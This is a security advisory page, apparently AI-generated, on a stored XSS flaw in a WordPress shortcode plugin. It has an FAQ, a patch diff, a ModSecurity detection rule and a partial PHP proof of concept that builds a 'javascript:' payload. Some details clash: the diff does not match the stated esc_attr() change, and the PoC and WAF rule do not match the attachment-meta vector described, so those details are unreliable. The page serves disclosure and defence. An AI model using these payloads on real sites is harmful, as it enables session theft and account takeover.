What is CVE-2026-0738?

CVE-2026-0738 is a stored Cross-Site Scripting (XSS) vulnerability in the Shortcodes Ultimate plugin for WordPress. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘su_carousel’ shortcode, which can execute when other users view the affected pages.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the ‘su_slide_link’ attachment meta field. Attackers can insert JavaScript payloads into the shortcode attributes, leading to script execution in the context of users who access the compromised page.

Who is affected by this vulnerability?

Any WordPress site using Shortcodes Ultimate version 7.4.8 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability, making sites with multiple content authors particularly at risk.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Shortcodes Ultimate plugin installed. If it is version 7.4.8 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is patched in version 7.4.9 of the Shortcodes Ultimate plugin. Updating to this version will resolve the issue by implementing proper URL sanitization for the vulnerable shortcode.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Shortcodes Ultimate plugin temporarily or restricting access to authenticated users with Contributor privileges until the plugin can be updated.

What does a CVSS score of 6.4 indicate?

A CVSS score of 6.4 is considered medium severity, indicating that while the vulnerability can lead to significant issues, it requires authenticated access to exploit. This means that the risk is moderate but should not be ignored.

What are the potential impacts of this vulnerability?

Successful exploitation can allow attackers to execute arbitrary JavaScript, leading to session hijacking, account takeover, or unauthorized actions performed on behalf of other users. Since the XSS is stored, it affects all users who view the compromised content.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an authenticated user can create a post with a malicious shortcode that contains a JavaScript payload. When other users view the post, the injected script executes, demonstrating the vulnerability’s impact.

What code changes were made to fix the vulnerability?

The patch replaces the use of ‘esc_attr()’ with ‘esc_url()’ for the ‘su_slide_link’ parameter in the affected files. This change ensures that URLs are properly sanitized, preventing the injection of malicious scripts into the href attributes.

What should I do if I suspect my site has been compromised?

If you suspect exploitation of this vulnerability, immediately update the plugin to the patched version, review user activity, and check for unauthorized changes to content. It may also be necessary to reset passwords for affected accounts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-0738: Shortcodes Ultimate <= 7.4.8 – authenticated (Contributor+) Stored Cross-Site Scripting via 'su_carousel' Shortcode (shortcodes-ultimate)

CVE ID CVE-2026-0738

Plugin shortcodes-ultimate

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 7.4.8

Patched Version 7.4.9

Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0738:
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Shortcodes Ultimate WordPress plugin. The issue affects the ‘su_carousel’ shortcode and related gallery components. Attackers with Contributor-level access or higher can inject malicious scripts that execute when other users view the compromised pages. The CVSS score of 6.4 reflects the moderate impact of this stored XSS vulnerability.

The root cause is insufficient output escaping for the ‘su_slide_link’ attachment meta field. The plugin’s shortcode rendering functions directly concatenate user-controlled link values into HTML anchor tags without proper URL validation. The vulnerable code resides in three files: ‘shortcodes-ultimate/includes/shortcodes/carousel.php’ line 220, ‘custom-gallery.php’ line 151, and ‘slider.php’ line 203. Each location uses the same flawed pattern where ‘$slide[‘link’]’ is inserted directly into the href attribute without escaping.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker creates or edits a post containing the vulnerable shortcode. They inject a JavaScript payload via the ‘su_slide_link’ parameter within the shortcode attributes. For example, an attacker could use ‘javascript:alert(document.cookie)’ as the link value. When the post renders, the malicious script executes in the victim’s browser context, allowing session hijacking or administrative actions.

The patch replaces ‘esc_attr()’ with ‘esc_url()’ for the link parameter in all three affected files. The ‘esc_attr()’ function only escapes HTML attributes but does not validate URL schemes. The ‘esc_url()’ function properly sanitizes URLs by removing dangerous protocols and encoding special characters. This change prevents JavaScript and other dangerous schemes from being injected into href attributes. The plugin version also increments from 7.4.8 to 7.4.9 in ‘shortcodes-ultimate.php’.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of authenticated users. This can lead to session cookie theft, account takeover, content manipulation, or administrative actions performed on behalf of victims. Since the XSS is stored, a single injection affects all users who view the compromised page. The Contributor+ access requirement limits the attack surface but still exposes sites with multiple content authors.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/shortcodes-ultimate/includes/shortcodes/carousel.php
+++ b/shortcodes-ultimate/includes/shortcodes/carousel.php
@@ -220,7 +220,7 @@
 			$return .= '<div class="su-carousel-slide">';
 			// Slide content with link
 			if ( $slide['link'] ) {
-				$return .= '<a href="' . $slide['link'] . '"' . $target . ' title="' . esc_attr( $slide['title'] ) . '"><img src="' . $image['url'] . '" alt="' . esc_attr( $slide['title'] ) . '" />' . $title . '</a>';
+				$return .= '<a href="' . esc_url( $slide['link'] ) . '"' . $target . ' title="' . esc_attr( $slide['title'] ) . '"><img src="' . $image['url'] . '" alt="' . esc_attr( $slide['title'] ) . '" />' . $title . '</a>';
 			}
 			// Slide content without link
 			else {
--- a/shortcodes-ultimate/includes/shortcodes/custom-gallery.php
+++ b/shortcodes-ultimate/includes/shortcodes/custom-gallery.php
@@ -151,7 +151,7 @@
 			$return .= '<div class="su-custom-gallery-slide" style="width:' . $atts['width'] . 'px;height:' . $atts['height'] . 'px">';
 			// Slide content with link
 			if ( $slide['link'] ) {
-				$return .= '<a href="' . esc_attr( $slide['link'] ) . '"' . $atts['target'] . ' title="' . esc_attr( $slide['title'] ) . '"><img src="' . $image['url'] . '" alt="' . esc_attr( $slide['title'] ) . '" width="' . $atts['width'] . '" height="' . $atts['height'] . '" />' . $title . '</a>';
+				$return .= '<a href="' . esc_url( $slide['link'] ) . '"' . $atts['target'] . ' title="' . esc_attr( $slide['title'] ) . '"><img src="' . $image['url'] . '" alt="' . esc_attr( $slide['title'] ) . '" width="' . $atts['width'] . '" height="' . $atts['height'] . '" />' . $title . '</a>';
 			}
 			// Slide content without link
 			else {
--- a/shortcodes-ultimate/includes/shortcodes/slider.php
+++ b/shortcodes-ultimate/includes/shortcodes/slider.php
@@ -203,7 +203,7 @@
 			$return .= '<div class="su-slider-slide">';
 			// Slide content with link
 			if ( $slide['link'] ) {
-				$return .= '<a href="' . esc_attr( $slide['link'] ) . '" ' . $target . ' title="' . esc_attr( $slide['title'] ) . '"><img src="' . $image['url'] . '" alt="' . esc_attr( $slide['title'] ) . '" />' . $title . '</a>';
+				$return .= '<a href="' . esc_url( $slide['link'] ) . '" ' . $target . ' title="' . esc_attr( $slide['title'] ) . '"><img src="' . $image['url'] . '" alt="' . esc_attr( $slide['title'] ) . '" />' . $title . '</a>';
 			}
 			// Slide content without link
 			else {
--- a/shortcodes-ultimate/shortcodes-ultimate.php
+++ b/shortcodes-ultimate/shortcodes-ultimate.php
@@ -8,7 +8,7 @@
  * Description: A comprehensive collection of visual components for WordPress
  * Text Domain: shortcodes-ultimate
  * License: GPLv3
- * Version: 7.4.8
+ * Version: 7.4.9
  * Requires PHP: 5.4
  * Requires at least: 5.0
  * Tested up to: 6.9
@@ -63,6 +63,6 @@
         }
     }
     define( 'SU_PLUGIN_FILE', __FILE__ );
-    define( 'SU_PLUGIN_VERSION', '7.4.8' );
+    define( 'SU_PLUGIN_VERSION', '7.4.9' );
     require_once dirname( __FILE__ ) . '/plugin.php';
 }
 No newline at end of file

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-0738
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1000738,phase:2,deny,status:403,chain,msg:'CVE-2026-0738 via Shortcodes Ultimate AJAX',severity:'CRITICAL',tag:'CVE-2026-0738',tag:'WordPress',tag:'Plugin/Shortcodes-Ultimate',tag:'attack-xss'"
  SecRule ARGS_POST:action "@rx ^(su|shortcodes)_" "chain"
    SecRule ARGS_POST:su_slide_link "@rx ^javascript:" 
      "t:lowercase,t:urlDecodeUni,t:htmlEntityDecode,capture,setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0738 - Shortcodes Ultimate <= 7.4.8 - authenticated (Contributor+) Stored Cross-Site Scripting via 'su_carousel' Shortcode

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to demonstrate XSS via javascript: protocol in href attribute
$payload = 'javascript:alert(document.domain)';

// Create a WordPress post with the malicious shortcode
$post_content = "[su_carousel source='media: recent' link='custom' su_slide_link='{$payload}']";
$post_title = 'Test Post with XSS';

// Initialize cURL session for WordPress authentication
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Get login page to retrieve nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
$login_page = curl_exec($ch);

// Step 2: Submit login credentials
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$login_response = curl_exec($ch);

// Step 3: Create new post with malicious shortcode
$post_data = array(
    'post_title' => $post_title,
    'content' => $post_content,
    'post_status' => 'publish',
    'post_type' => 'post'
);

// Get nonce for post creation (simplified - actual implementation would parse admin page)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$post_page = curl_exec($ch);

// Note: Full PoC would extract nonce from post-new.php and submit via admin-ajax.php
// This simplified version demonstrates the vulnerable parameter construction

echo "Vulnerable shortcode constructed:n";
echo $post_content . "nn";
echo "When this post renders, the carousel slide link will execute: {$payload}n";
echo "Full exploitation requires proper nonce handling via WordPress AJAX endpoints.n";

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-0738?
Understanding the vulnerability
CVE-2026-0738 is a stored Cross-Site Scripting (XSS) vulnerability in the Shortcodes Ultimate plugin for WordPress. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘su_carousel’ shortcode, which can execute when other users view the affected pages.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the ‘su_slide_link’ attachment meta field. Attackers can insert JavaScript payloads into the shortcode attributes, leading to script execution in the context of users who access the compromised page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using Shortcodes Ultimate version 7.4.8 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability, making sites with multiple content authors particularly at risk.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Shortcodes Ultimate plugin installed. If it is version 7.4.8 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 7.4.9 of the Shortcodes Ultimate plugin. Updating to this version will resolve the issue by implementing proper URL sanitization for the vulnerable shortcode.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the Shortcodes Ultimate plugin temporarily or restricting access to authenticated users with Contributor privileges until the plugin can be updated.
What does a CVSS score of 6.4 indicate?
Understanding risk levels
A CVSS score of 6.4 is considered medium severity, indicating that while the vulnerability can lead to significant issues, it requires authenticated access to exploit. This means that the risk is moderate but should not be ignored.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can allow attackers to execute arbitrary JavaScript, leading to session hijacking, account takeover, or unauthorized actions performed on behalf of other users. Since the XSS is stored, it affects all users who view the compromised content.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept illustrates how an authenticated user can create a post with a malicious shortcode that contains a JavaScript payload. When other users view the post, the injected script executes, demonstrating the vulnerability’s impact.
What code changes were made to fix the vulnerability?
Details of the patch
The patch replaces the use of ‘esc_attr()’ with ‘esc_url()’ for the ‘su_slide_link’ parameter in the affected files. This change ensures that URLs are properly sanitized, preventing the injection of malicious scripts into the href attributes.
What should I do if I suspect my site has been compromised?
Responding to potential breaches
If you suspect exploitation of this vulnerability, immediately update the plugin to the patched version, review user activity, and check for unauthorized changes to content. It may also be necessary to reset passwords for affected accounts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations